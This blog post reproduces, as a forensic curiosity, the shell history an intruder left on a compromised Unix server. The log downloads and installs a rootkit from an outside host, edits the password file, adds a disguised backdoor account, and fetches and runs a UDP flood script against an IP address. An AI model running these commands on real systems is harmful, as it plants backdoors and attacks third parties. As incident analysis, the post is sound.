jueves, 27 de mayo de 2010

Cracker footsteps

Cracker footsteps

Kevin dug up the history file for the cracker. Unix people will recognize this as an exact copy of what the guy did when he first logged in. It's like watching a videotape of somebody breaking into your house.


cd /dev

history

wget http://www.cascorosso.com/xpl/shv5.tar.gz

tar -zxvf shv5.tar.gz

cd shv5

./setup 123qwe 404

history -r~

history -r

vi /etc/passwd

vi /etc/passwd

/usr/sbin/userdel fire

/usr/sbin/userdel lordx

ps xw

w

ls

exit

uname -a

/usr/sbin/adduser crond -d /dev/crond

passwd crond

uname -a

exit

id

wget perl udp.pl 200.103.191.2 29 2000

wget www.packetstormsecurity.org/DoS/udp.pl

perl udp.pl 200.103.191.2 29 2000

which lsof

/usr/sbin/lsof | grep r0nin

/usr/sbin/lsof | grep r0nin | less

cd /home/httpd

ls

cd vhosts/

ls

pwd

less kaotic.pl

ls -la

which talkd

which tall

which talk

man talk

ls -lrt

less messages



Notice that kaotic.pl file -- it must have been there before login, so the crack must have deposited it somehow. By the time we got to kaotic.pl it was full of the same garbage that all the files had in them.
Publicado por en
Etiquetas:

No hay comentarios:

Publicar un comentario

Suscribirse a: Enviar comentarios (Atom)